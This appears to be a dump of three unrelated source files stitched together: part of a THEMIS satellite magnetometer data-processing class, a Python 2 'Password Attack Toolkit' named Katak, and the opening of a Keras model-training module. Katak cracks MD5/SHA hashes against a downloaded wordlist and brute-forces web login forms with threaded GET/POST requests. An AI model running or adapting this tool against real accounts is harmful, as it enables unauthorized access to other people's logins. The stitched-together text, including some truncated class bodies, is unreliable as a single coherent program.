'flux_y': f'FY_ELEC_MOM_ESA-{satellite.upper()}',
}
self.peemIdentifyMagnetosheath = self._importCdasItemWithExceptions(
cdasArgs,timeSeriesKey,targetKeys,DataSet
)
def defaultProcessing(self,
removeMagnetosheath=False,
minRadius=4,
allowSkipMagnetosheathRemovalIfInsufficientData = True
) -> None:
"""Performs a standard processing procedure on THEMIS data.
:param removeMagnetosheath: Whether to remove data while in the magnetosheath
:param minRadius: Radius in earth radii below which to remove magnetic field data
"""
self.interpolate()
self.magneticField.constrainAbsoluteValue(400)
self.meanField = self.magneticField.runningAverage(timeWindow=np.timedelta64(35,"m"))
self.magneticField = self.magneticField - self.meanField
self.fillLessThanRadius(minRadius)
if removeMagnetosheath:
self.removeMagnetosheath()
self.convertToMeanFieldCoordinates()
self.magneticFieldMeanFieldCoordinates.fillNaN()
class CdasImportError(Exception):
class CdasNoDataReturnedError(Exception):
pass
class CdasKeyMissingError(Exception):
pass
class CdasUnspecifedMissingDataError(Exception):
pass
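def _example_themis_workflow():
    """Minimal usage sketch (illustrative only; the date range and satellite letter
    below are arbitrary examples, not taken from the original module)."""
    import datetime
    themis = THEMISdata()
    themis.importCDAS(
        datetime.datetime(2007, 9, 4),
        datetime.datetime(2007, 9, 5),
        satellite="D",
    )
    themis.defaultProcessing(removeMagnetosheath=True, minRadius=4)
    # The processed field, in mean-field-aligned coordinates, is now available here:
    return themis.magneticFieldMeanFieldCoordinates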
|
katak.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import sys
import time
import hashlib
import requests
import threading
import progressbar
class hash_kill:
class TypeError(Exception):
def __init__(self):
Exception.__init__(self, "Its not supported algorithms!")
def __init__(self, hash):
self.hash = hash
self.type = self.detect()
if self.type in "md5 sha1 sha224 sha256 sha384 sha512":self.kill()
else:print "[!] Something went error..."
def detect(self):
if len(self.hash) == 32:return "md5"
elif len(self.hash) == 40:return "sha1"
elif len(self.hash) == 56:return "sha224"
elif len(self.hash) == 64:return "sha256"
elif len(self.hash) == 96:return "sha384"
elif len(self.hash) == 128:return "sha512"
else:raise self.TypeError()
def kill(self):
print "[+] Hash type:",self.type
wordlist_ = open("password.txt", 'r').readlines()
progress = progressbar.ProgressBar()
print "[+] Cracking..."
for word in progress(wordlist_):
if self.hash != eval('hashlib.{}("{}").hexdigest()'.format(self.type, word.strip())):pass
else:print "\n[+] Password Found:",word;break;print "[!] Done.\n";time.sleep(1.5);main()
print "\n[!] Done.\n"
time.sleep(1.5)
main()
class brute_force:
def __init__(self, url, params, wordlist, match_word, method, thread=None, timeout=None):
self.url = url
self.params = params
self.wordlist = wordlist
self.match_word = match_word
self.method = method
if thread:
self.thread = thread
self.timeout = None
else:
self.thread = False
if timeout:self.timeout = timeout
else:self.timeout = 1
self.bruteForce()
def withThread(self):
def post(self):
for word in open(self.wordlist).read().split("\n"):
params = {}
sys.stdout.write(u"\u001b[1000D[*] Trying pass {}".format(word))
sys.stdout.flush()
params.update({self.params.split("&")[0].split("=")[0]:self.params.split("&")[0].split("=")[1],self.params.split("&")[1].replace("=",""):word})
response = requests.post(self.url, data=params).text
if self.match_word not in response:pass
else:print "\n[+] You have successfully logged in.";print "[+] Matched word: {}".format(self.match_word);break
print "[!] Done.\n"
def get(self):
for word in open(self.wordlist).read().split("\n"):
sys.stdout.write(u"\u001b[1000D[*] Trying pass {}".format(word))
sys.stdout.flush()
response = requests.get(self.url+"?"+self.params).text
if self.match_word not in response:pass
else:print "\n[+] You have successfully logged in.";print "[+] Match word: {}".format(self.match_word);break
print "[!] Done.\n"
if self.method == "get":
t = threading.Thread(target=get, args=(self,))
elif self.method == "post":
t = threading.Thread(target=post, args=(self,))
else:
t = threading.Thread(target=get, args=(self,))
t.start()
def withNoThread(self):
def post(self):
for word in open(self.wordlist).read().split("\n"):
params = {}
sys.stdout.write(u"\u001b[1000D[*] Trying pass {}".format(word))
sys.stdout.flush()
params.update({self.params.split("&")[0].split("=")[0]:self.params.split("&")[0].split("=")[1],self.params.split("&")[1].replace("=",""):word})
response = requests.post(self.url, data=params).text
if self.match_word not in response:pass
else:print "\n[+] You have successfully logged in.";print "[+] Matched word: {}".format(self.match_word);break
time.sleep(self.timeout)
print "[!] Done.\n"
def get(self):
for word in open(self.wordlist).read().split("\n"):
sys.stdout.write(u"\u001b[1000D[*] Trying pass {}".format(word))
sys.stdout.flush()
response = requests.get(self.url+"?"+self.params).text
if self.match_word not in response:pass
else:print "\n[+] You have successfully logged in.";print "[+] Matched word: {}".format(self.match_word);break
time.sleep(self.timeout)
print "[!] Done.\n"
if self.method == "get":get(self)
elif self.method == "post":post(self)
else:get(self)
def bruteForce(self):
if self.thread != False:self.withThread()
else:self.withNoThread()
class download:
class NetworkError(Exception):
def __init__(self):
Exception.__init__(self, "Network is unreachable!")
def __init__(self, url):
self.url = url
self.wordlist()
def wordlist(self):
try:__wordlist__=requests.get(self.url).text;open("password.txt","w").write(__wordlist__);print "[+] Downloaded: password.txt\n[+] String loaded: {}".format(len(open("password.txt").read()))
except:raise self.NetworkError()
def main():
opt = raw_input("[h]ash-killer [b]rute-force [w]ordlist [a]bout: ")
if opt.lower() == "h":
hash_kill(raw_input("[*] enter hash: "))
elif opt.lower() == "b":
url = raw_input("[*] enter url: ")
params = raw_input("[*] enter params: ")
wordlist = raw_input("[*] wordlist: ")
match_word = raw_input("[*] match word: ")
method = raw_input("[*] method: ")
thread = raw_input("[*] thread (y/n): ")
if thread.lower() == "y":thread=True
elif thread.lower() == "n":thread=None
else:thread=None
if thread != True:
timeout = raw_input("[*] timeout (default: 1s): ")
if timeout != "":pass
else:timeout=1
else:
timeout=None
brute_force(url, params, wordlist, match_word, method, thread, timeout)
main()
elif opt.lower() == "w":
opt = raw_input("[d]ownload [u]pdate [b]ack: ")
if opt == "d":
url = raw_input("[*] enter url: ")
download(url)
time.sleep(1.5)
main()
elif opt == "u":
try:
__wordlist__ = requests.get("https://raw.githubusercontent.com/Gameye98/Gameye98.github.io/master/wordlist/password.txt").text
open("password.txt","w").write(__wordlist__)
print "[+] Updated: password.txt"
print "[+] String loaded: {}".format(len(open("password.txt").read()))
time.sleep(1.5)
main()
except:print "[!] NetworkError: Network is unreachable";main()
elif opt == "b":
main()
elif opt.lower() == "a":
print __about__
main()
else:
main()
__banner__ = """
Katak (v0.0.1-dev) by DedSecTL...
=================================
* Hash Killer 80%
* Hash Detection 75%
* Brute Force 90%
* Big Wordlist 100%
* Support Threading 100%
"""
__about__ = """
About
-----
Katak - Password Attack Toolkit
Author : DedSecTL <dtlily>
Version : 0.0.1
Team : BlackHole Security
Date : Sun Oct 28 21:08:48 2018
Telegram : @dtlily
Line : dtl.lily
"""
if __name__ == '__main__':
try:
print __banner__
main()
except KeyboardInterrupt:
sys.exit()
|
training.py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import absolute_import
import warnings
import copy
import time
import numpy as np
import multiprocessing
import threading
import six
try:
import queue
except ImportError:
import Queue as queue
from .topology import Container
from .. import backend as K
from .. import optimizers
from .. import losses
from .. import metrics as metrics_module
from ..utils.generic_utils import Progbar
from .. import callbacks as cbks
from ..legacy import interfaces
def _standardize_input_data(data, names, shapes=None,
check_batch_axis=True,
exception_prefix=''):
"""Normalizes inputs and targets provided by users.
Users may pass data as a list of arrays, dictionary of arrays,
or as a single array. We normalize this to an ordered list of
arrays (same order as `names`), while checking that the provided
arrays have shapes that match the network's expectations.
# Arguments
data: User-provided input data (polymorphic).
names: List of expected array names.
shapes: Optional list of expected array shapes.
check_batch_axis: Boolean; whether to check that
the batch axis of the arrays matches the expected
value found in `shapes`.
exception_prefix: String prefix used for exception formatting.
# Returns
List of standardized input arrays (one array per model input).
# Raises
ValueError: in case of improperly formatted user-provided data.
"""
if not names:
return []
if data is None:
return [None for _ in range(len(names))]
if isinstance(data, dict):
arrays = []
for name in names:
if name not in data:
raise ValueError('No data provided for "' +
name + '". Need data for each key in: ' +
str(names))
arrays.append(data[name])
elif isinstance(data, list):
if len(data) != len(names):
if data and hasattr(data[0], 'shape'):
raise ValueError('Error when checking model ' +
exception_prefix +
': the list of Numpy arrays '
'that you are passing to your model '
'is not the size the model expected. '
'Expected to see ' + str(len(names)) +
' arrays but instead got '
'the following list of ' + str(len(data)) +
' arrays: ' + str(data)[:200] +
'...')
else:
if len(names) == 1:
data = [np.asarray(data)]
else:
raise ValueError(
'Error when checking model ' +
exception_prefix +
': you are passing a list as '
'input to your model, '
'but the model expects '
'a list of ' + str(len(names)) +
' Numpy arrays instead. '
'The list you passed was: ' +
str(data)[:200])
arrays = data
else:
if not hasattr(data, 'shape'):
raise TypeError('Error when checking model ' +
exception_prefix +
': data should be a Numpy array, '
'or list/dict of Numpy arrays. '
'Found: ' + str(data)[:200] + '...')
if len(names) > 1:
# Case: model expects multiple inputs but only received
# a single Numpy array.
raise ValueError('The model expects ' + str(len(names)) +
exception_prefix +
' arrays, but only received one array. '
'Found: array with shape ' + str(data.shape))
arrays = [data]
# Make arrays at least 2D.
for i in range(len(names)):
array = arrays[i]
if len(array.shape) == 1:
array = np.expand_dims(array, 1)
arrays[i] = array
# Check shapes compatibility.
if shapes:
for i in range(len(names)):
if shapes[i] is None:
continue
array = arrays[i]
if len(array.shape) != len(shapes[i]):
raise ValueError('Error when checking ' + exception_prefix +
': expected ' + names[i] +
' to have ' + str(len(shapes[i])) +
' dimensions, but got array with shape ' +
str(array.shape))
for j, (dim, ref_dim) in enumerate(zip(array.shape, shapes[i])):
if not j and not check_batch_axis:
# skip the first axis
continue
if ref_dim:
if ref_dim != dim:
raise ValueError(
'Error when checking ' + exception_prefix +
': expected ' + names[i] +
' to have shape ' + str(shapes[i]) +
' but got array with shape ' +
str(array.shape))
return arrays
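# Example (illustrative): for a model with inputs named ['a', 'b'],
# _standardize_input_data({'a': xa, 'b': xb}, ['a', 'b']) returns [xa, xb];
# a single Numpy array passed to a single-input model is wrapped into a
# one-element list, and 1D arrays are expanded to shape (samples, 1).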
def _standardize_sample_or_class_weights(x_weight, output_names, weight_type):
"""Maps `sample_weight` or `class_weight` to model outputs.
# Arguments
x_weight: User-provided `sample_weight` or `class_weight` argument.
output_names: List of output names (strings) in the model.
weight_type: A string used purely for exception printing.
# Returns
A list of `sample_weight` or `class_weight` with exactly
one element per model output.
# Raises
ValueError: In case of invalid user-provided argument.
"""
if x_weight is None or len(x_weight) == 0:
return [None for _ in output_names]
if len(output_names) == 1:
if isinstance(x_weight, list) and len(x_weight) == 1:
return x_weight
if isinstance(x_weight, dict) and output_names[0] in x_weight:
return [x_weight[output_names[0]]]
else:
return [x_weight]
if isinstance(x_weight, list):
if len(x_weight) != len(output_names):
raise ValueError('Provided `' + weight_type + '` was a list of ' +
str(len(x_weight)) +
' elements, but the model has ' +
str(len(output_names)) + ' outputs. '
'You should provide one `' + weight_type + '`'
'array per model output.')
return x_weight
if isinstance(x_weight, dict):
x_weights = []
for name in output_names:
x_weights.append(x_weight.get(name))
return x_weights
else:
raise TypeError('The model has multiple outputs, so `' +
weight_type + '` '
'should be either a list or a dict. '
'Provided `' + weight_type +
'` type not understood: ' +
str(x_weight))
def _standardize_class_weights(class_weight, output_names):
return _standardize_sample_or_class_weights(class_weight,
output_names,
'class_weight')
def _standardize_sample_weights(sample_weight, output_names):
return _standardize_sample_or_class_weights(sample_weight,
output_names,
'sample_weight')
def _check_array_lengths(inputs, targets, weights):
"""Does user input validation for numpy arrays.
# Arguments
inputs: list of Numpy arrays of inputs.
targets: list of Numpy arrays of targets.
weights: list of Numpy arrays of sample weights.
# Raises
ValueError: in case of incorrectly formatted data.
"""
x_lengths = [x.shape[0] for x in inputs]
y_lengths = [y.shape[0] for y in targets]
w_lengths = [w.shape[0] for w in weights]
set_x = set(x_lengths)
if len(set_x) > 1:
raise ValueError('All input arrays (x) should have '
'the same number of samples. Got array shapes: ' +
str([x.shape for x in inputs]))
set_y = set(y_lengths)
if len(set_y) > 1:
raise ValueError('All target arrays (y) should have '
'the same number of samples. Got array shapes: ' +
str([y.shape for y in targets]))
set_w = set(w_lengths)
if len(set_w) > 1:
raise ValueError('All sample_weight arrays should have '
'the same number of samples. Got array shapes: ' +
str([w.shape for w in weights]))
if set_x and set_y and list(set_x)[0] != list(set_y)[0]:
raise ValueError('Input arrays should have '
'the same number of samples as target arrays. '
'Found ' + str(list(set_x)[0]) + ' input samples '
'and ' + str(list(set_y)[0]) + ' target samples.')
if set_y and set_w and list(set_y)[0] != list(set_w)[0]:
raise ValueError('Sample_weight arrays should have '
'the same number of samples as target arrays. Got ' +
str(list(set_y)[0]) + ' input samples and ' +
str(list(set_w)[0]) + ' target samples.')
def _check_loss_and_target_compatibility(targets, loss_fns, output_shapes):
"""Does validation on the compatiblity of targets and loss functions.
This helps prevent users from using loss functions incorrectly.
# Arguments
targets: list of Numpy arrays of targets.
loss_fns: list of loss functions.
output_shapes: list of shapes of model outputs.
# Raises
ValueError: if a loss function or target array
is incompatible with an output.
"""
key_losses = {'mean_squared_error',
'binary_crossentropy',
'categorical_crossentropy'}
for y, loss, shape in zip(targets, loss_fns, output_shapes):
if loss is None:
continue
if loss.__name__ == 'categorical_crossentropy':
if y.shape[-1] == 1:
raise ValueError(
'You are passing a target array of shape ' + str(y.shape) +
' while using as loss `categorical_crossentropy`. '
'`categorical_crossentropy` expects '
'targets to be binary matrices (1s and 0s) '
'of shape (samples, classes). '
'If your targets are integer classes, '
'you can convert them to the expected format via:\n'
'```\n'
'from keras.utils.np_utils import to_categorical\n'
'y_binary = to_categorical(y_int)\n'
'```\n'
'\n'
'Alternatively, you can use the loss function '
'`sparse_categorical_crossentropy` instead, '
'which does expect integer targets.')
if loss.__name__ in key_losses:
for target_dim, out_dim in zip(y.shape[1:], shape[1:]):
if out_dim is not None and target_dim != out_dim:
raise ValueError(
'A target array with shape ' + str(y.shape) +
' was passed for an output of shape ' + str(shape) +
' while using as loss `' + loss.__name__ + '`. '
'This loss expects '
'targets to have the same shape '
'as the output.')
def _collect_metrics(metrics, output_names):
"""Maps metric functions to model outputs.
# Arguments
metrics: a list or dict of metric functions.
output_names: a list of the names (strings) of model outputs.
# Returns
A list (one entry per model output) of lists of metric functions.
For instance, if the model has 2 outputs, and for the first output
we want to compute "binary_accuracy" and "binary_crossentropy",
and just "binary_accuracy" for the second output,
the list would look like:
`[[binary_accuracy, binary_crossentropy], [binary_accuracy]]`
# Raises
TypeError: if an incorrect type is passed for the `metrics` argument.
"""
if not metrics:
return [[] for _ in output_names]
if isinstance(metrics, list):
# we then apply all metrics to all outputs.
return [copy.copy(metrics) for _ in output_names]
elif isinstance(metrics, dict):
nested_metrics = []
for name in output_names:
output_metrics = metrics.get(name, [])
if not isinstance(output_metrics, list):
output_metrics = [output_metrics]
nested_metrics.append(output_metrics)
return nested_metrics
else:
raise TypeError('Type of `metrics` argument not understood. '
'Expected a list or dictionary, found: ' +
str(metrics))
def _batch_shuffle(index_array, batch_size):
"""Shuffles an array in a batch-wise fashion.
Useful for shuffling HDF5 arrays
(where one cannot access arbitrary indices).
# Arguments
index_array: array of indices to be shuffled.
batch_size: integer.
# Returns
The `index_array` array, shuffled in a batch-wise fashion.
"""
batch_count = int(len(index_array) / batch_size)
# to reshape we need to be cleanly divisible by batch size
# we stash extra items and reappend them after shuffling
last_batch = index_array[batch_count * batch_size:]
index_array = index_array[:batch_count * batch_size]
index_array = index_array.reshape((batch_count, batch_size))
np.random.shuffle(index_array)
index_array = index_array.flatten()
return np.append(index_array, last_batch)
def _make_batches(size, batch_size):
"""Returns a list of batch indices (tuples of indices).
# Arguments
size: Integer, total size of the data to slice into batches.
batch_size: Integer, batch size.
# Returns
A list of tuples of array indices.
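# Example
A small illustrative call (the sizes are arbitrary):
```python
_make_batches(10, 4)  # -> [(0, 4), (4, 8), (8, 10)]
```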
"""
num_batches = int(np.ceil(size / float(batch_size)))
return [(i * batch_size, min(size, (i + 1) * batch_size))
for i in range(0, num_batches)]
def _slice_arrays(arrays, start=None, stop=None):
"""Slice an array or list of arrays.
This takes an array-like, or a list of
array-likes, and outputs:
- arrays[start:stop] if `arrays` is an array-like
- [x[start:stop] for x in arrays] if `arrays` is a list
Can also work on list/array of indices: `_slice_arrays(x, indices)`
# Arguments
arrays: Single array or list of arrays.
start: can be an integer index (start index)
or a list/array of indices
stop: integer (stop index); should be None if
`start` was a list.
# Returns
A slice of the array(s).
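# Example
An illustrative sketch (the array contents are arbitrary):
```python
import numpy as np
x = np.arange(10)
_slice_arrays([x, x], 2, 5)  # -> [array([2, 3, 4]), array([2, 3, 4])]
_slice_arrays(x, [0, 3, 7])  # index-list form -> array([0, 3, 7])
```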
"""
if isinstance(arrays, list):
if hasattr(start, '__len__'):
# hdf5 datasets only support list objects as indices
if hasattr(start, 'shape'):
start = start.tolist()
return [x[start] for x in arrays]
else:
return [x[start:stop] for x in arrays]
else:
if hasattr(start, '__len__'):
if hasattr(start, 'shape'):
start = start.tolist()
return arrays[start]
else:
return arrays[start:stop]
def _weighted_masked_objective(fn):
"""Adds support for masking and sample-weighting to an objective function.
It transforms an objective function `fn(y_true, y_pred)`
into a sample-weighted, cost-masked objective function
`fn(y_true, y_pred, weights, mask)`.
# Arguments
fn: The objective function to wrap,
with signature `fn(y_true, y_pred)`.
# Returns
A function with signature `fn(y_true, y_pred, weights, mask)`.
"""
if fn is None:
return None
def weighted(y_true, y_pred, weights, mask=None):
"""Wrapper function.
# Arguments
y_true: `y_true` argument of `fn`.
y_pred: `y_pred` argument of `fn`.
weights: Weights tensor.
mask: Mask tensor.
# Returns
Scalar tensor.
"""
# score_array has ndim >= 2
score_array = fn(y_true, y_pred)
if mask is not None:
# Cast the mask to floatX to avoid float64 upcasting in theano
mask = K.cast(mask, K.floatx())
# mask should have the same shape as score_array
score_array *= mask
# the loss per batch should be proportional
# to the number of unmasked samples.
score_array /= K.mean(mask)
# reduce score_array to same ndim as weight array
ndim = K.ndim(score_array)
weight_ndim = K.ndim(weights)
score_array = K.mean(score_array, axis=list(range(weight_ndim, ndim)))
# apply sample weighting
if weights is not None:
score_array *= weights
score_array /= K.mean(K.cast(K.not_equal(weights, 0), K.floatx()))
return K.mean(score_array)
return weighted
def _masked_objective(fn):
"""Adds support for masking to an objective function.
It transforms an objective function `fn(y_true, y_pred)`
into a cost-masked objective function
`fn(y_true, y_pred, mask)`.
# Arguments
fn: The objective function to wrap,
with signature `fn(y_true, y_pred)`.
# Returns
A function with signature `fn(y_true, y_pred, mask)`.
"""
def masked(y_true, y_pred, mask=None):
"""Wrapper function.
# Arguments
y_true: `y_true` argument of `fn`.
y_pred: `y_pred` argument of `fn`.
mask: Mask tensor.
# Returns
Scalar tensor.
"""
# score_array has ndim >= 2
score_array = fn(y_true, y_pred)
if mask is not None:
# Cast the mask to floatX to avoid float64 upcasting in theano
mask = K.cast(mask, K.floatx())
# mask should have the same shape as score_array
score_array *= mask
# the loss per batch should be proportional
# to the number of unmasked samples.
score_array /= K.mean(mask)
return K.mean(score_array)
return masked
def _standardize_weights(y, sample_weight=None, class_weight=None,
sample_weight_mode=None):
"""Performs sample weight validation and standardization.
Everything gets normalized to a single sample-wise (or timestep-wise)
weight array.
# Arguments
y: Numpy array of model targets to be weighted.
sample_weight: User-provided `sample_weight` argument.
class_weight: User-provided `class_weight` argument.
sample_weight_mode: One of `None` or `"temporal"`.
`"temporal"` indicated that we expect 2D weight data
that will be applied to the last 2 dimensions of
the targets (i.e. we are weighting timesteps, not samples).
# Returns
A numpy array of target weights, one entry per sample to weight.
# Raises
ValueError: In case of invalid user-provided arguments.
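# Example
A minimal sketch of the `class_weight` path; the target values and
weights below are arbitrary placeholders:
```python
import numpy as np
y = np.array([[0], [1], [1]])
_standardize_weights(y, class_weight={0: 1., 1: 2.})  # -> array([1., 2., 2.])
```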
"""
if sample_weight_mode is not None:
if sample_weight_mode != 'temporal':
raise ValueError('"sample_weight_mode '
'should be None or "temporal". '
'Found: ' + str(sample_weight_mode))
if len(y.shape) < 3:
raise ValueError('Found a sample_weight array for '
'an input with shape ' +
str(y.shape) + '. '
'Timestep-wise sample weighting (use of '
'sample_weight_mode="temporal") is restricted to '
'outputs that are at least 3D, i.e. that have '
'a time dimension.')
if sample_weight is not None and len(sample_weight.shape) != 2:
raise ValueError('Found a sample_weight array with shape ' +
str(sample_weight.shape) + '. '
'In order to use timestep-wise sample weighting, '
'you should pass a 2D sample_weight array.')
else:
if sample_weight is not None and len(sample_weight.shape) != 1:
raise ValueError('Found a sample_weight array with shape ' +
str(sample_weight.shape) + '. '
'In order to use timestep-wise sample weights, '
'you should specify '
'sample_weight_mode="temporal" '
'in compile(). If you just mean to use '
'sample-wise weights, make sure your '
'sample_weight array is 1D.')
if sample_weight is not None:
if len(sample_weight.shape) > len(y.shape):
raise ValueError('Found a sample_weight with shape ' +
str(sample_weight.shape) + '. '
'Expected sample_weight with rank '
'less than or equal to ' + str(len(y.shape)))
if y.shape[:sample_weight.ndim] != sample_weight.shape:
raise ValueError('Found a sample_weight array with shape ' +
str(sample_weight.shape) + ' for an input with shape ' +
str(y.shape) + '. '
'sample_weight cannot be broadcast.')
return sample_weight
elif isinstance(class_weight, dict):
if len(y.shape) > 2:
raise ValueError('class_weight not supported for '
'3+ dimensional targets.')
if y.shape[1] > 1:
y_classes = y.argmax(axis=1)
elif y.shape[1] == 1:
y_classes = np.reshape(y, y.shape[0])
else:
y_classes = y
weights = np.asarray([class_weight[cls] for cls in y_classes])
return weights
else:
if sample_weight_mode is None:
return np.ones((y.shape[0],), dtype=K.floatx())
else:
return np.ones((y.shape[0], y.shape[1]), dtype=K.floatx())
class GeneratorEnqueuer(object):
"""Builds a queue out of a data generator.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
generator: a generator function which endlessly yields data
pickle_safe: use multiprocessing if True, otherwise threading
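# Example
An illustrative sketch of the queue-draining pattern used by the
`*_generator` methods in this module (the generator and shapes are
arbitrary placeholders):
```python
import numpy as np

def data_gen():
    while True:
        yield np.random.random((8, 4)), np.random.random((8, 1))

enqueuer = GeneratorEnqueuer(data_gen())
enqueuer.start(workers=1, max_q_size=4)
batch = None
while enqueuer.is_running():
    if not enqueuer.queue.empty():
        batch = enqueuer.queue.get()
        break
enqueuer.stop()
```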
"""
def __init__(self, generator, pickle_safe=False):
self._generator = generator
self._pickle_safe = pickle_safe
self._threads = []
self._stop_event = None
self.queue = None
def start(self, workers=1, max_q_size=10, wait_time=0.05):
"""Kicks off threads which add data from the generator into the queue.
# Arguments
workers: number of worker threads
max_q_size: queue size (when full, threads could block on put())
wait_time: time to sleep in-between calls to put()
"""
def data_generator_task():
while not self._stop_event.is_set():
try:
if self._pickle_safe or self.queue.qsize() < max_q_size:
generator_output = next(self._generator)
self.queue.put(generator_output)
else:
time.sleep(wait_time)
except Exception:
self._stop_event.set()
raise
try:
if self._pickle_safe:
self.queue = multiprocessing.Queue(maxsize=max_q_size)
self._stop_event = multiprocessing.Event()
else:
self.queue = queue.Queue()
self._stop_event = threading.Event()
for _ in range(workers):
if self._pickle_safe:
# Reset random seed else all children processes
# share the same seed
np.random.seed()
thread = multiprocessing.Process(target=data_generator_task)
thread.daemon = True
else:
thread = threading.Thread(target=data_generator_task)
self._threads.append(thread)
thread.start()
except:
self.stop()
raise
def is_running(self):
return self._stop_event is not None and not self._stop_event.is_set()
def stop(self, timeout=None):
"""Stop running threads and wait for them to exit, if necessary.
Should be called by the same thread which called start().
# Arguments
timeout: maximum time to wait on thread.join()
"""
if self.is_running():
self._stop_event.set()
for thread in self._threads:
if thread.is_alive():
if self._pickle_safe:
thread.terminate()
else:
thread.join(timeout)
if self._pickle_safe:
if self.queue is not None:
self.queue.close()
self._threads = []
self._stop_event = None
self.queue = None
class Model(Container):
"""The `Model` class adds training & evaluation routines to a `Container`.
"""
def compile(self, optimizer, loss, metrics=None, loss_weights=None,
sample_weight_mode=None, **kwargs):
"""Configures the model for training.
# Arguments
optimizer: str (name of optimizer) or optimizer object.
See [optimizers](/optimizers).
loss: str (name of objective function) or objective function.
See [losses](/losses).
If the model has multiple outputs, you can use a different loss
on each output by passing a dictionary or a list of losses.
The loss value that will be minimized by the model
will then be the sum of all individual losses.
metrics: list of metrics to be evaluated by the model
during training and testing.
Typically you will use `metrics=['accuracy']`.
To specify different metrics for different outputs of a
multi-output model, you could also pass a dictionary,
such as `metrics={'output_a': 'accuracy'}`.
loss_weights: Optional list or dictionary specifying scalar
coefficients (Python floats) to weight the loss contributions
of different model outputs.
The loss value that will be minimized by the model
will then be the *weighted sum* of all individual losses,
weighted by the `loss_weights` coefficients.
If a list, it is expected to have a 1:1 mapping
to the model's outputs. If a dict, it is expected to map
output names (strings) to scalar coefficients.
sample_weight_mode: if you need to do timestep-wise
sample weighting (2D weights), set this to `"temporal"`.
`None` defaults to sample-wise weights (1D).
If the model has multiple outputs, you can use a different
`sample_weight_mode` on each output by passing a
dictionary or a list of modes.
**kwargs: when using the Theano backend, these arguments
are passed into K.function. When using the Tensorflow backend,
these arguments are passed into `tf.Session.run`.
# Raises
ValueError: In case of invalid arguments for
`optimizer`, `loss`, `metrics` or `sample_weight_mode`.
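# Example
A minimal sketch of a typical compile call; the architecture, optimizer
and loss below are illustrative choices, not requirements:
```python
from keras.layers import Input, Dense
from keras.models import Model

inputs = Input(shape=(10,))
outputs = Dense(1, activation='sigmoid')(inputs)
model = Model(inputs=inputs, outputs=outputs)
model.compile(optimizer='rmsprop',
              loss='binary_crossentropy',
              metrics=['accuracy'])
```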
"""
loss = loss or {}
self.optimizer = optimizers.get(optimizer)
self.sample_weight_mode = sample_weight_mode
self.loss = loss
self.loss_weights = loss_weights
# Prepare loss functions.
if isinstance(loss, dict):
for name in loss:
if name not in self.output_names:
raise ValueError('Unknown entry in loss '
'dictionary: "' + name + '". '
'Only expected the following keys: ' +
str(self.output_names))
loss_functions = []
for name in self.output_names:
if name not in loss:
warnings.warn('Output "' + name +
'" missing from loss dictionary. '
'We assume this was done on purpose, '
'and we will not be expecting '
'any data to be passed to "' + name +
'" during training.', stacklevel=2)
loss_functions.append(losses.get(loss.get(name)))
elif isinstance(loss, list):
if len(loss) != len(self.outputs):
raise ValueError('When passing a list as loss, '
'it should have one entry per model output. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed loss=' +
str(loss))
loss_functions = [losses.get(l) for l in loss]
else:
loss_function = losses.get(loss)
loss_functions = [loss_function for _ in range(len(self.outputs))]
self.loss_functions = loss_functions
weighted_losses = [_weighted_masked_objective(fn) for fn in loss_functions]
skip_indices = []
self._feed_outputs = []
self._feed_output_names = []
self._feed_output_shapes = []
self._feed_loss_fns = []
for i in range(len(weighted_losses)):
if weighted_losses[i] is None:
skip_indices.append(i)
else:
self._feed_outputs.append(self.outputs[i])
self._feed_output_names.append(self.output_names[i])
self._feed_output_shapes.append(self.internal_output_shapes[i])
self._feed_loss_fns.append(self.loss_functions[i])
# Prepare output masks.
masks = self.compute_mask(self.inputs, mask=None)
if masks is None:
masks = [None for _ in self.outputs]
if not isinstance(masks, list):
masks = [masks]
# Prepare loss weights.
if loss_weights is None:
loss_weights_list = [1. for _ in range(len(self.outputs))]
elif isinstance(loss_weights, dict):
for name in loss_weights:
if name not in self.output_names:
raise ValueError('Unknown entry in loss_weights '
'dictionary: "' + name + '". '
'Only expected the following keys: ' +
str(self.output_names))
loss_weights_list = []
for name in self.output_names:
loss_weights_list.append(loss_weights.get(name, 1.))
elif isinstance(loss_weights, list):
if len(loss_weights) != len(self.outputs):
raise ValueError('When passing a list as loss_weights, '
'it should have one entry per model output. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed loss_weights=' +
str(loss_weights))
loss_weights_list = loss_weights
else:
raise TypeError('Could not interpret loss_weights argument: ' +
str(loss_weights) +
' - expected a list or a dict.')
# Prepare sample weights.
sample_weights = []
sample_weight_modes = []
if isinstance(sample_weight_mode, dict):
for name in sample_weight_mode:
if name not in self.output_names:
raise ValueError('Unknown entry in '
'sample_weight_mode dictionary: "' +
name + '". '
'Only expected the following keys: ' +
str(self.output_names))
for i, name in enumerate(self.output_names):
if i in skip_indices:
weight = None
sample_weight_modes.append(None)
else:
if name not in sample_weight_mode:
raise ValueError('Output "' + name +
'" missing from sample_weight_modes '
'dictionary')
if sample_weight_mode.get(name) == 'temporal':
weight = K.placeholder(ndim=2,
name=name + '_sample_weights')
sample_weight_modes.append('temporal')
else:
weight = K.placeholder(ndim=1,
name=name + '_sample_weights')
sample_weight_modes.append(None)
sample_weights.append(weight)
elif isinstance(sample_weight_mode, list):
if len(sample_weight_mode) != len(self.outputs):
raise ValueError('When passing a list as sample_weight_mode, '
'it should have one entry per model output. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed '
'sample_weight_mode=' +
str(sample_weight_mode))
for i in range(len(self.output_names)):
if i in skip_indices:
weight = None
sample_weight_modes.append(None)
else:
mode = sample_weight_mode[i]
name = self.output_names[i]
if mode == 'temporal':
weight = K.placeholder(ndim=2,
name=name + '_sample_weights')
sample_weight_modes.append('temporal')
else:
weight = K.placeholder(ndim=1,
name=name + '_sample_weights')
sample_weight_modes.append(None)
sample_weights.append(weight)
else:
for i, name in enumerate(self.output_names):
if i in skip_indices:
sample_weight_modes.append(None)
sample_weights.append(None)
else:
if sample_weight_mode == 'temporal':
sample_weights.append(
K.placeholder(ndim=2,
name=name + '_sample_weights'))
sample_weight_modes.append('temporal')
else:
sample_weights.append(
K.placeholder(ndim=1,
name=name + '_sample_weights'))
sample_weight_modes.append(None)
self.sample_weight_modes = sample_weight_modes
self._feed_sample_weight_modes = []
for i in range(len(self.outputs)):
if i not in skip_indices:
self._feed_sample_weight_modes.append(self.sample_weight_modes[i])
# Prepare targets of model.
self.targets = []
self._feed_targets = []
